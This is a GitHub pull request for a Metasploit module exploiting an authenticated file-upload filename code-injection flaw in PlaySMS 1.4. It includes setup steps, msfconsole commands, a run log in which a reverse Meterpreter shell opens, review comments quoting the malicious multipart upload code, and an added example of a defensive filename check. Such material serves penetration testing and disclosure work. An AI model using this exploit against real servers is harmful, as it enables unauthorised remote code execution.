
playsms_filename_exec.rb #9944

Merged
merged 8 commits into from May 7, 2018
Merged

Conversation

touhidshaikh
Contributor

@touhidshaikh touhidshaikh commented Apr 27, 2018

Description

This module exploits an authenticated file upload with a remote code execution vulnerability in the filename parameter in PlaySMS version 1.4. This issue is caused by improper file name handling in the sendfromfile.php file. Authenticated users can upload a file and rename the file name with a malicious payload. Additional information and vulnerabilities can be viewed on Exploit-DB 42044.
NOTE: This module was already submitted as a pull request but for some reason was closed by the author; check #9840.

Vulnerable Application

Available at Exploit-DB

Vulnerable Application Installation Setup

Download application: wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz

Extract: tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz

Move into the web directory: mv playsms-1.4/web/* /var/www/html/

Make the config file: cp /var/www/html/config-dist.php /var/www/html/config.php

Change owner: chown -R www-data:www-data /var/www/html/

Set DB credentials in the config.php file, and import playsms-1.4/db/playsms.sql into your playsms database.

Now visit: http://localhost/

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/playsms_filename_exec
  4. Do: set rport <port>
  5. Do: set rhost <ip>
  6. Do: set targeturi SecreTSMSgatwayLogin
  7. Do: set username touhid
  8. Do: set password diana
  9. Do: check
     [*] 10.22.1.10:80 The target appears to be vulnerable.
  10. Do: set lport <port>
  11. Do: set lhost <ip>
  12. Do: exploit
  13. You should get a shell.

Scenarios

Playsms on Ubuntu Linux

msf exploit(multi/http/playsms_filename_exec) > run

[*] Started reverse TCP handler on 10.22.1.3:4444
[+] X-CSRF-Token for login : 13bce9776cfc270a3779e8b557330cc2
[*] Trying to Login ......
[+] Authentication successful : [ touhid:diana ]
[+] X-CSRF-Token for upload : 2780d48dc11a482a58d8a95ad873c6cc
[*] Trying to upload file with malicious Filename Field....
[*] Sending stage (37775 bytes) to 10.22.1.15
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.15:38814) at 2018-04-08 13:45:34 +0530

meterpreter >
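As an added example (not code from this PR or from PlaySMS), here is the kind of server-side check an upload handler such as sendfromfile.php should apply to the client-supplied multipart filename before using it anywhere; the character allowlist, the accepted extensions and the sample Content-Disposition headers are assumptions constructed for this example.

```ruby
# Added example, not part of this PR or of PlaySMS: a defensive check for the
# client-supplied "filename" of a multipart form-data part, the value this
# module abuses. The allowlist and accepted extensions are assumptions.
ALLOWED_NAME = /\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/
ALLOWED_EXT  = %w[csv txt].freeze

# Extract the quoted filename from a Content-Disposition header value, or nil.
def filename_from_disposition(header)
  m = header.match(/filename="([^"]*)"/)
  m && m[1]
end

# Return a validated basename, or nil when the name must be rejected outright.
# Rejecting (rather than "cleaning") leaves no room for metacharacters to
# survive into a later shell or PHP context.
def safe_upload_filename(raw)
  return nil if raw.nil? || raw.empty?
  base = raw.split(/[\\\/]/).last.to_s        # drop any client-sent path
  return nil unless base.match?(ALLOWED_NAME)  # letters, digits, . _ - only
  ext = File.extname(base).sub(/\A\./, '').downcase
  return nil unless ALLOWED_EXT.include?(ext)  # no .php, no missing extension
  base
end

# Decide for one multipart part header: [:accept, safe_name] or [:reject, raw].
def check_part(header)
  raw  = filename_from_disposition(header)
  safe = safe_upload_filename(raw)
  safe ? [:accept, safe] : [:reject, raw]
end

# Constructed sample part headers, as a browser or a script might send them.
SAMPLE_PARTS = [
  'form-data; name="fncsv"; filename="recipients.csv"',
  'form-data; name="fncsv"; filename="../../recipients.csv"',
  'form-data; name="fncsv"; filename="list;id.csv"',
  'form-data; name="fncsv"; filename="list.php"',
  'form-data; name="fncsv_dup"'
].freeze

SAMPLE_PARTS.each do |h|
  verdict, name = check_part(h)
  puts format('%-7s %s', verdict, name.inspect)
end
```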

PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
@touhidshaikh
Contributor Author

Hey @bcoles, I have added the doc.

@bcoles bcoles added docs and removed needs-docs labels Apr 28, 2018
@jrobles-r7 jrobles-r7 self-assigned this May 4, 2018
@jrobles-r7 jrobles-r7 left a comment


Review comments. Also, please change the indentation from 4 spaces to 2 spaces to follow the style guide.

'DarkS3curity' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>

Add CVE reference
CVE-2017-9080

12. Do: `exploit`
13. You should get a shell.

## Options

The Options section can probably be removed in this case.

# setup POST request.
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token
post_data.add_part("agent22", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = "form-data; name=\"fncsv\"; filename=\"#{evilname}\"") # payload

Can the data agent22 be randomized or is that required?
Same question for fncsv.

post_data = Rex::MIME::Message.new
post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token
post_data.add_part("agent22", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = "form-data; name=\"fncsv\"; filename=\"#{evilname}\"") # payload
post_data.add_part("1", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="fncsv_dup"') # extra

Can fncsv_dup be randomized?

post_data.add_part("1", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="fncsv_dup"') # extra
data = post_data.to_s

print_status('Trying to upload file with malicious Filename Field....')

Consider changing to vprint_status.

remove options sections
added CVE, URL and done randomizing content
@touhidshaikh
Contributor Author

Hey @jrobles-r7, thanks for the review and the suggestions. I have made changes according to your suggestions. 👍

touhidshaikh and others added 4 commits May 4, 2018 21:13
print_status to vprint_status
indentation and fix CVE
@jrobles-r7 jrobles-r7 merged commit 601411f into rapid7:master May 7, 2018
jrobles-r7 added a commit that referenced this pull request May 7, 2018
@jrobles-r7
Contributor

jrobles-r7 commented May 7, 2018

Release Notes

The PlaySMS module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in the sendfromfile.php file. Authenticated users can upload a file and rename the file with a malicious payload.

msjenkins-r7 pushed a commit that referenced this pull request May 7, 2018
@touhidshaikh touhidshaikh deleted the playsms-flename-rce branch May 8, 2018 15:01